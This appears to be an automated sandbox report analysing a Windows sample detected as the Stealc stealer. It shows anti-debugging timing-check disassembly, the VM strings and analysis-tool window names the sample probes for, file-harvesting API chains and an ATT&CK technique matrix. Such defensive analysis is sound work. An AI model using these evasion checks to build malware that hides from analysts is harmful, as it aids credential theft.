                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D134 second address: 92D138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D2B0 second address: 92D2B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D2B6 second address: 92D2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D2BA second address: 92D2C4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7F1D21A766h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D59B second address: 92D5D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1CE19AB0h 0x00000009 popad 0x0000000a ja 00007F7F1CE19AAEh 0x00000010 pushad 0x00000011 popad 0x00000012 jl 00007F7F1CE19AA6h 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jmp 00007F7F1CE19AAEh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D5D2 second address: 92D5E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F7F1D21A76Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D5E5 second address: 92D5ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D5ED second address: 92D5F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D90F second address: 92D924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1CE19AAFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D924 second address: 92D93D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7F1D21A76Fh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D93D second address: 92D958 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jp 00007F7F1CE19AA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F7F1CE19AAFh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DAA6 second address: 92DAC9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7F1D21A766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7F1D21A779h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DAC9 second address: 92DB05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1CE19AB1h 0x00000007 jmp 00007F7F1CE19AB4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F7F1CE19AACh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DB05 second address: 92DB0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DB0A second address: 92DB1E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7F1CE19AAAh 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F7F1CE19AA6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DB1E second address: 92DB22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E526 second address: 92E52A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E52A second address: 92E548 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A776h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E548 second address: 92E54C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 930EB9 second address: 930ECA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A76Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93C190 second address: 93C1D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1CE19AAFh 0x00000009 jc 00007F7F1CE19AB3h 0x0000000f jmp 00007F7F1CE19AADh 0x00000014 pop ebx 0x00000015 push eax 0x00000016 jmp 00007F7F1CE19AABh 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F7F1CE19AB3h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93C1D8 second address: 93C1DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 949839 second address: 94984A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7F1CE19AAAh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B49F second address: 95B4A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B4A5 second address: 95B4B7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007F7F1CE19AA6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B4B7 second address: 95B4DE instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7F1D21A766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F7F1D21A771h 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 ja 00007F7F1D21A766h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95BE78 second address: 95BE7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95BE7C second address: 95BE82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95BE82 second address: 95BE88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C016 second address: 95C01A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C18E second address: 95C1AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1CE19AB8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C1AA second address: 95C1AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95DB17 second address: 95DB1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95DB1B second address: 95DB1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95DB1F second address: 95DB46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7F1CE19AB8h 0x0000000c jno 00007F7F1CE19AA6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95F369 second address: 95F39B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1D21A775h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7F1D21A770h 0x00000011 jnl 00007F7F1D21A766h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95F39B second address: 95F3AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jl 00007F7F1CE19AA6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9622E9 second address: 9622ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9622ED second address: 96231A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 je 00007F7F1CE19AA6h 0x0000000d pop edx 0x0000000e popad 0x0000000f nop 0x00000010 mov dx, CC1Eh 0x00000014 mov edx, eax 0x00000016 push dword ptr [ebp+1245F9CAh] 0x0000001c mov edx, dword ptr [ebp+122D2203h] 0x00000022 push 5AE600D1h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96231A second address: 96231E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96231E second address: 962324 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9657C3 second address: 9657CD instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7F1D21A766h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9657CD second address: 9657E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jne 00007F7F1CE19AA6h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9657E3 second address: 9657E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9657E7 second address: 9657ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB02BC second address: 4FB02CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB02CB second address: 4FB02F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7F1CE19AAFh 0x00000009 jmp 00007F7F1CE19AB3h 0x0000000e popfd 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB02F4 second address: 4FB03A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F7F1D21A774h 0x0000000d push eax 0x0000000e pushad 0x0000000f call 00007F7F1D21A771h 0x00000014 push ecx 0x00000015 pop ebx 0x00000016 pop eax 0x00000017 movsx edi, cx 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F7F1D21A772h 0x00000023 or cx, FBE8h 0x00000028 jmp 00007F7F1D21A76Bh 0x0000002d popfd 0x0000002e movzx esi, di 0x00000031 popad 0x00000032 mov ebp, esp 0x00000034 jmp 00007F7F1D21A76Bh 0x00000039 pop ebp 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d call 00007F7F1D21A76Bh 0x00000042 pop ecx 0x00000043 pushfd 0x00000044 jmp 00007F7F1D21A779h 0x00000049 sbb cx, BB66h 0x0000004e jmp 00007F7F1D21A771h 0x00000053 popfd 0x00000054 popad 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB03E8 second address: 4FB0433 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1CE19AB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F7F1CE19AAEh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F7F1CE19AADh 0x00000019 jmp 00007F7F1CE19AB0h 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0433 second address: 4FB0457 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7F1D21A770h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0457 second address: 4FB0466 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1CE19AABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884D0A second address: 884D10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6D1B2F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6CF2A2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6D1A42 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 87F861 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004838B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004838B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00484910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00484910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0047DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0047DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0047E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0047E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00484570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00484570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0047ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0047ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0047BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0047BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0047DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0047DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004716D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00483EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00483EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0047F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0047F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00471160 GetSystemInfo,ExitProcess,0_2_00471160
                Source: file.exe, file.exe, 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1701335364.000000000121E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareVE
                Source: file.exe, 00000000.00000002.1701335364.0000000001296000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1701335364.0000000001277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1701335364.000000000121E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.1701335364.0000000001262000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13590
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13587
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13609
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13601
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13641
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004745C0 VirtualProtect ?,00000004,00000100,000000000_2_004745C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00489860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00489860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00489750 mov eax, dword ptr fs:[00000030h]0_2_00489750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00487850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00487850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6968, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00489600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00489600
                Source: file.exe, file.exe, 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00487B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00486920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00486920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00487850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00487850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00487A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00487A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.470000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1701335364.000000000121E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1660531613.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6968, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.470000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1701335364.000000000121E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1660531613.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6968, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
